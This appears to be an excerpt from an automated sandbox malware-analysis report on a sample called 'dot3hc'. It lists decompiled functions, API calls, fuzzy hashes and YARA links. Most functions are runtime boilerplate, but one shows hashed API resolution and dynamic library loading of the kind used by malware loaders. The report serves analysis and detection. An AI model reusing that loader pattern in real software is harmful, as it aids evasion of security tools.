0x0230333f
0x02303347
0x02303347
0x02303350

APIs

QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,?), ref: 02303330

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 3e0b6e9ad44e8c0294e2eface8104f694cf6329e340b8a8f4a8d1be8b90cdd96
Instruction ID: 4c0d3ee596e6bf032ed11f7d20f35ee9d282f88b13ed1b098405d0857c12a9d3
Opcode Fuzzy Hash: 3e0b6e9ad44e8c0294e2eface8104f694cf6329e340b8a8f4a8d1be8b90cdd96
Instruction Fuzzy Hash: 2AF0E0623453563BE13856695C5CE6BE69ECBC5BA5F20062EB905DB2C0DEA5CC048370

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3D5, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A3D5(void* __ebx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* __esi;
				void* __ebp;
				void* _t10;
				long _t11;
				void* _t15;
				void* _t16;
				struct HWND__* _t18;

				if(_a8 != 0x360) {
					_t18 = _a4;
					_t10 = E00409CBE(_t15, _t16, _t18, __eflags, _t18);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						_t11 = DefWindowProcA(_t18, _a8, _a12, _a16);
						L6:
						return _t11;
					}
					__eflags =  *((intOrPtr*)(_t10 + 0x20)) - _t18;
					if(__eflags != 0) {
						goto L5;
					}
					_t11 = E0040A2E8(__ebx, _t16, _t18, __eflags, _t10, _t18, _a8, _a12, _a16); // executed
					goto L6;
				}
				return 1;
			}

0x0040a3df
0x0040a3e7
0x0040a3eb
0x0040a3f0
0x0040a3f2
0x0040a40b
0x0040a415
0x0040a41b
0x00000000
0x0040a41b
0x0040a3f4
0x0040a3f7
0x00000000
0x00000000
0x0040a404
0x00000000
0x0040a404
0x00000000

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a17bd75e753565c8c32fb72635d9df3520f5a8b73c1fc148d280dd7364c2ad56
Instruction ID: 3517ec6858cdfff4f58573c3d98e2797eedff766390b39a1751ee799ad3f77ef
Opcode Fuzzy Hash: a17bd75e753565c8c32fb72635d9df3520f5a8b73c1fc148d280dd7364c2ad56
Instruction Fuzzy Hash: 57F01236404219BBCF129F919C08CDB3B69FF19350F00C436F91561192C379C931ABAB

Uniqueness

Uniqueness Score: -1.00%

Function 004039B1, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b936a4012c24706efac4ff068db0b712045a314d1aab1eb0685984eebb805aa3
Instruction ID: c99c244189d94d7dca9a997e17c70eaa2b4c72b9032cbafb8dd16296e0632aa4
Opcode Fuzzy Hash: b936a4012c24706efac4ff068db0b712045a314d1aab1eb0685984eebb805aa3
Instruction Fuzzy Hash: AFE080F51242119BCB204E24D4417AB7FD85B51736F205B3FD0B1E32D0D27689C3AB1A

Uniqueness

Uniqueness Score: -1.00%

Function 022E25E0, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

Part of subcall function 022E14A0: SetLastError.KERNEL32(0000007F), ref: 022E14DB

ExitProcess.KERNEL32 ref: 022E2620

Memory Dump Source

Source File: 00000003.00000002.615064004.00000000022E1000.00000020.00000001.sdmp, Offset: 022E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22e1000_dot3hc.jbxd

Similarity

API ID: ErrorExitLastProcess
String ID:
API String ID: 1697593849-0
Opcode ID: d603c8b69f5236d9a85b1413eafd00f40e9b55def37d28c1f9e7916c3f45cd9b
Instruction ID: fea02d1ba56298fd02b378ba1a20352e930b3d77cdb32f78236b931b4fc6bd47
Opcode Fuzzy Hash: d603c8b69f5236d9a85b1413eafd00f40e9b55def37d28c1f9e7916c3f45cd9b
Instruction Fuzzy Hash: BBE0EDB5D10208ABEF40EFE4D849BADBBB5AB04701F808564E91667244E6705B14AFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00405BFB, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BFB(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _t6;

				_t17 = _a8 - 0x110;
				if(_a8 != 0x110) {
					__eflags = 0;
					return 0;
				}
				_t6 = E0040EC19(0x435490, E00409CBE(__ecx, __edi, __esi, _t17, _a4));
				if(_t6 == 0) {
					return 1;
				}
				return  *((intOrPtr*)( *_t6 + 0x148))();
			}

0x00405bfb
0x00405c03
0x00405c30
0x00000000
0x00405c30
0x00405c14
0x00405c1d
0x00000000
0x00405c2d
0x00000000

APIs

KiUserCallbackDispatcher.NTDLL(?,0041E007,?,00000110,?,?), ref: 00405C23

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 8788a7d1b342c7a73f8b4dbd68cddcdd91617aaa1f30f57faead809fcf95685c
Instruction ID: 13a74c7961ba7f7106fd47ab7c0937022831a7dfd7673cd185c48f694b9ae367
Opcode Fuzzy Hash: 8788a7d1b342c7a73f8b4dbd68cddcdd91617aaa1f30f57faead809fcf95685c
Instruction Fuzzy Hash: 88E0C23560CB0D9EFB18A2318946A6B3294DB84309F204C3BE407E11D1DB3D8C816D0D

Uniqueness

Uniqueness Score: -1.00%

Function 02304F76, Relevance: 1.5, APIs: 1, Instructions: 18
libraryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E02304F76(signed int __edx) {
				struct HINSTANCE__* _t6;
				void* _t8;
				char _t10;
				void* _t11;
				intOrPtr _t14;
				void* _t15;
				void* _t24;
				signed int _t25;
				WCHAR* _t27;
				void* _t28;

				_t25 = __edx;
				_t27 = E02302674(_t11);
				E02302F84(0xf568ce83, 0xeaf577de, 0x134);
				_t6 = LoadLibraryW(_t27);
				_t14 =  *0x230a4c0; // 0x5b18c0
				 *(_t14 + 4 + _t25 * 4) = _t6;
				_t15 = _t27;
				_t28 = _t24;
				_push(_t28);
				_t8 =  *((intOrPtr*)(E02302F84(0xf568ce83, 0x71eb2479, 0x14d)))();
				E02302F84(0xf568ce83, 0x5e575f04, 0x1e3);
				_t10 = RtlFreeHeap(_t8, 0, _t15); // executed
				return _t10;
			}

0x02304f78
0x02304f7f
0x02304f91
0x02304f97
0x02304f99
0x02304f9f
0x02304fa3
0x02304fa6
0x02302fdf
0x02302ff7
0x0230300c
0x02303012
0x02303015

APIs

LoadLibraryW.KERNELBASE(00000000,33CEB415,1925BE3B,02305091,?,2895FB0B,?,?,02304CDA), ref: 02304F97

Memory Dump Source

Source File: 00000003.00000002.615127704.0000000002301000.00000020.00000001.sdmp, Offset: 02300000, based on PE: true

Associated: 00000003.00000002.615121787.0000000002300000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.615142665.0000000002309000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2300000_dot3hc.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 43d06233a81e8fb32d1735a1f7cdb06edf2d30d5a698d5985b33bdba4466e69c
Instruction ID: 356bcd4b1cecd6524f8e0b30ea88280be7ce8d1b7050d2a4214e935aae28454f
Opcode Fuzzy Hash: 43d06233a81e8fb32d1735a1f7cdb06edf2d30d5a698d5985b33bdba4466e69c
Instruction Fuzzy Hash: DBD0A7257453215BC268EA7978AC95B66ABDFC93E5B14453AD91DCB7C0CE70CC02C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 022E1820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 022E182F

Memory Dump Source

Source File: 00000003.00000002.615064004.00000000022E1000.00000020.00000001.sdmp, Offset: 022E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22e1000_dot3hc.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: a4df8ff0dab7dea93342202d8f6e3dbe808f357e778907587f4c6bec63147848
Instruction ID: e552d3bf741cdae945ade2abef543379257dba56f07d079e4ffe55ab5d946d6b
Opcode Fuzzy Hash: a4df8ff0dab7dea93342202d8f6e3dbe808f357e778907587f4c6bec63147848
Instruction Fuzzy Hash: BFC04C7A55420CEB8B04DFD8E884DAB37ADBB8C711B048948BA1D87200C630F9109BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00410555, Relevance: 12.1, APIs: 8, Instructions: 129
filestringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00410555(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				long _t49;
				CHAR* _t50;
				CHAR* _t56;
				CHAR* _t59;
				void* _t61;
				int _t65;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t89;
				void* _t90;
				CHAR* _t92;
				void* _t93;
				void* _t96;
				struct _WIN32_FIND_DATAA* _t98;
				void* _t100;
				CHAR* _t106;

				_t94 = __esi;
				_t90 = __edx;
				_t76 = __ecx;
				_t98 = _t100 - 0x13c;
				_t38 =  *0x443590; // 0x8ffedb05
				 *(_t98 + 0x140) = _t38 ^ _t98;
				_push(0x14);
				E0041F6EA(E0043298A, __ebx, __edi, __esi);
				_t92 =  *(_t98 + 0x14c);
				_t74 =  *(_t98 + 0x150);
				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
				_t106 = _t92;
				_t107 = _t106 == 0;
				if(_t106 == 0) {
					L1:
					E004037E3(_t74, _t76, _t92, _t94, _t107);
				}
				if((0 | _t74 != 0x00000000) == 0) {
					goto L1;
				}
				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
				if(_t49 != 0) {
					__eflags = _t49 - 0x104;
					if(_t49 >= 0x104) {
						goto L5;
					} else {
						E0040320E(_t98 - 0x10, E0040EA5E());
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						E0041038B(_t74, _t98, __eflags, _t92, _t98 - 0x10);
						_t56 = PathIsUNCA( *(_t98 - 0x10));
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							E00403036( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
							_t50 = 1;
							__eflags = 1;
						} else {
							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t98 - 0x1c) & 0x00000002;
								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
									CharUpperA(_t92);
								}
								__eflags =  *(_t98 - 0x1c) & 0x00000004;
								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
									goto L19;
								} else {
									_t61 = FindFirstFileA(_t74, _t98);
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										goto L19;
									} else {
										FindClose(_t61);
										__eflags =  *(_t98 - 0x14);
										if( *(_t98 - 0x14) == 0) {
											goto L10;
										} else {
											__eflags =  *(_t98 - 0x14) - _t92;
											if( *(_t98 - 0x14) <= _t92) {
												goto L10;
											} else {
												_t65 = lstrlenA( &(_t98->cFileName));
												_t89 =  *(_t98 - 0x14) - _t92;
												__eflags = _t65 + _t89 - 0x104;
												if(_t65 + _t89 >= 0x104) {
													goto L10;
												} else {
													_t97 = 0x104 - _t89;
													__eflags = 0x104 - _t89;
													E00403EBB(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97,  &(_t98->cFileName));
													goto L19;
												}
											}
										}
									}
								}
							} else {
								_push(_t74);
								E0041052A( *((intOrPtr*)(_t98 - 0x18)));
								L10:
								E00403036( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
								goto L5;
							}
						}
					}
				} else {
					E00402FE8(_t74, _t76, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
					_push(_t74);
					E0041052A( *((intOrPtr*)(_t98 - 0x18)));
					L5:
					_t50 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				_pop(_t93);
				_pop(_t96);
				_pop(_t75);
				return E0041E5DF(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
			}

APIs

__EH_prolog3.LIBCMT ref: 00410574
GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 004105B5

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

PathIsUNCA.SHLWAPI(?,00000000), ref: 004105FF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0041061D
CharUpperA.USER32(?), ref: 00410644
FindFirstFileA.KERNEL32(?,00000000), ref: 00410655
FindClose.KERNEL32(00000000), ref: 00410661
lstrlenA.KERNEL32(?), ref: 00410676

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 4099955704-0
Opcode ID: 8d423071c246daf2073a97ce94b957f1acc84d53f3ea7e5e8a4362d51d6eacf4
Instruction ID: c95776d52dd1443ee05a1ca64a85c65a6502b148270e7fb7a51c131ffc65af19
Opcode Fuzzy Hash: 8d423071c246daf2073a97ce94b957f1acc84d53f3ea7e5e8a4362d51d6eacf4
Instruction Fuzzy Hash: EE41A17190010AABDB21EFA5CC45BFF777DEF54318F00052AF815E2291EB789995CA68

Uniqueness

Uniqueness Score: -1.00%

Function 0041E5DF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0041E5DF(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x443590; // 0x8ffedb05
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x446b48 = _t6;
				 *0x446b44 = _t22;
				 *0x446b40 = _t25;
				 *0x446b3c = _t21;
				 *0x446b38 = _t27;
				 *0x446b34 = _t26;
				 *0x446b60 = ss;
				 *0x446b54 = cs;
				 *0x446b30 = ds;
				 *0x446b2c = es;
				 *0x446b28 = fs;
				 *0x446b24 = gs;
				asm("pushfd");
				_pop( *0x446b58);
				 *0x446b4c =  *_t31;
				 *0x446b50 = _v0;
				 *0x446b5c =  &_a4;
				 *0x446a98 = 0x10001;
				_t11 =  *0x446b50; // 0x0
				 *0x446a4c = _t11;
				 *0x446a40 = 0xc0000409;
				 *0x446a44 = 1;
				_t12 =  *0x443590; // 0x8ffedb05
				_v812 = _t12;
				_t13 =  *0x443594; // 0x700124fa
				_v808 = _t13;
				 *0x446a90 = IsDebuggerPresent();
				_push(1);
				E0042BADB(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter("@jD");
				if( *0x446a90 == 0) {
					_push(1);
					E0042BADB(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

APIs

IsDebuggerPresent.KERNEL32 ref: 00424CB5
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00424CCA
UnhandledExceptionFilter.KERNEL32(@jD), ref: 00424CD5
GetCurrentProcess.KERNEL32(C0000409), ref: 00424CF1
TerminateProcess.KERNEL32(00000000), ref: 00424CF8

Strings

@jD, xrefs: 00424CD0

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: @jD
API String ID: 2579439406-1635275382
Opcode ID: c447d9a5082a45e17c64b574762009e2935f38cb7a259609e812312e6fb4b33c
Instruction ID: 353eb8598e0df34b4eb95eb5e3ae3fd6c07366769aae313645bd4fdf51cf0d1b
Opcode Fuzzy Hash: c447d9a5082a45e17c64b574762009e2935f38cb7a259609e812312e6fb4b33c
Instruction Fuzzy Hash: 6D21F2BC5007A09FC711DF59FC496847BA0FB1B308F52543AE908D3661E7B465848F0E

Uniqueness

Uniqueness Score: -1.00%

Function 00402130, Relevance: 9.1, APIs: 6, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00402130(intOrPtr __ecx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				struct HDC__* _v120;
				char _v124;
				int _v128;
				int _v132;
				int _v136;
				struct HICON__* _v140;
				intOrPtr _v144;
				void* __ebp;
				signed int _t37;
				int _t40;
				intOrPtr _t41;
				intOrPtr _t66;
				struct tagRECT* _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				signed int _t86;

				_t37 =  *0x443590; // 0x8ffedb05
				_v32 = _t37 ^ _t86;
				_v144 = __ecx;
				_t40 = IsIconic( *(_v144 + 0x20));
				_t87 = _t40;
				if(_t40 == 0) {
					_t41 = E00405C6C(_t66, _v144, _t84, _t85, __eflags);
				} else {
					_push(_v144);
					E0040E7ED(_t66,  &_v124, _t84, _t85, _t87);
					_t88 =  &_v124;
					if( &_v124 != 0) {
						_v136 = _v120;
					} else {
						_v136 = 0;
					}
					SendMessageA( *(_v144 + 0x20), 0x27, _v136, 0);
					_v128 = GetSystemMetrics(0xb);
					_v132 = GetSystemMetrics(0xc);
					_t82 =  &_v28;
					GetClientRect( *(_v144 + 0x20), _t82);
					asm("cdq");
					_v12 = _v20 - _v28 - _v128 + 1 - _t82 >> 1;
					asm("cdq");
					_v8 = _v16 - _v24 - _v132 + 1 - _t82 >> 1;
					_v140 =  *((intOrPtr*)(_v144 + 0x74));
					_t79 = _v8;
					DrawIcon(_v120, _v12, _v8, _v140);
					_t41 = E0040E841(_t66,  &_v124, _t84, _t85, _t88);
				}
				return E0041E5DF(_t41, _t66, _v32 ^ _t86, _t79, _t84, _t85);
			}

APIs

IsIconic.USER32(?), ref: 00402153

Part of subcall function 0040E7ED: __EH_prolog3.LIBCMT ref: 0040E7F4
Part of subcall function 0040E7ED: BeginPaint.USER32(?,?,00000004,00405C83,?,00000058,00402236), ref: 0040E820

SendMessageA.USER32(?,00000027,?,00000000), ref: 004021A1
GetSystemMetrics.USER32 ref: 004021A9
GetSystemMetrics.USER32 ref: 004021B4
GetClientRect.USER32 ref: 004021CB
DrawIcon.USER32 ref: 0040221B

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
String ID:
API String ID: 1007970657-0
Opcode ID: 2f6cd35a6b9dfaeb7081f42fbc75d1cf632e4bdf7bd37a2e3ba394ddb8d91dbc
Instruction ID: 239a3fe864a438b672b26ed0143a2d062fb3f574ffa283ab5bdaab9dccb6ddd8
Opcode Fuzzy Hash: 2f6cd35a6b9dfaeb7081f42fbc75d1cf632e4bdf7bd37a2e3ba394ddb8d91dbc
Instruction Fuzzy Hash: 80311D75A00109DFDB14DFB8D985FAEBBB5BF48304F1082A9E549E7281DA30A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0040A094, Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040A094(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E0040C981(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E00409BF3(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E00403ED6();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x0040a097
0x0040a0a3
0x0040a0eb
0x0040a0ed
0x0040a0f4
0x00000000
0x0040a0f6
0x0040a0aa
0x0040a0ae
0x00000000
0x00000000
0x0040a0b0
0x0040a0bd
0x00000000
0x0040a0d1
0x0040a0e0
0x00000000
0x0040a0e8

APIs

Part of subcall function 0040C981: GetWindowLongA.USER32 ref: 0040C98C

GetKeyState.USER32(00000010), ref: 0040A0B8
GetKeyState.USER32(00000011), ref: 0040A0C1
GetKeyState.USER32(00000012), ref: 0040A0CA
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0040A0E0

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 809d64707c866a6fea6fdfe0c08dbe96b0f4bf706804fe5c5b589de44f277889
Instruction ID: 09be2279584ced2a5f59b9ad430127016d441750cd54d9fdae9847761112cc12
Opcode Fuzzy Hash: 809d64707c866a6fea6fdfe0c08dbe96b0f4bf706804fe5c5b589de44f277889
Instruction Fuzzy Hash: 2CF0277234034E27EA207A764C41FEB71145F92BD8F018A3AB742FB1D1C9B9D812667A

Uniqueness

Uniqueness Score: -1.00%

Function 00424996, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00424996(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x446a2c = GetProcAddress(_t37, "FlsAlloc");
					 *0x446a30 = GetProcAddress(_t37, "FlsGetValue");
					 *0x446a34 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x446a2c;
					_t40 = TlsSetValue;
					 *0x446a38 = _t7;
					if( *0x446a2c == 0) {
						L6:
						 *0x446a30 = TlsGetValue;
						 *0x446a2c = E004246B6;
						 *0x446a34 = _t40;
						 *0x446a38 = TlsFree;
					} else {
						__eflags =  *0x446a30;
						if( *0x446a30 == 0) {
							goto L6;
						} else {
							__eflags =  *0x446a34;
							if( *0x446a34 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x4438c0 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x446a30);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E0041FBD2();
							 *0x446a2c = E004245E7( *0x446a2c);
							 *0x446a30 = E004245E7( *0x446a30);
							 *0x446a34 = E004245E7( *0x446a34);
							 *0x446a38 = E004245E7( *0x446a38);
							_t18 = E00422CB7();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E004246E9();
								goto L15;
							} else {
								_push(E00424875);
								_t21 =  *((intOrPtr*)(E00424653( *0x446a2c)))();
								__eflags = _t21 - 0xffffffff;
								 *0x4438bc = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E004265A8(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x4438bc);
										__eflags =  *((intOrPtr*)(E00424653( *0x446a34)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E00424726(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E004246E9();
					return 0;
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0041F5CD), ref: 0042499C
__mtterm.LIBCMT ref: 004249A8

Part of subcall function 004246E9: __decode_pointer.LIBCMT ref: 004246FA
Part of subcall function 004246E9: TlsFree.KERNEL32(00000020,00424B15), ref: 00424714

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004249BE
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004249CB
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004249D8
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004249E5
TlsAlloc.KERNEL32 ref: 00424A35
TlsSetValue.KERNEL32(00000000), ref: 00424A50
__init_pointers.LIBCMT ref: 00424A5A
__encode_pointer.LIBCMT ref: 00424A65
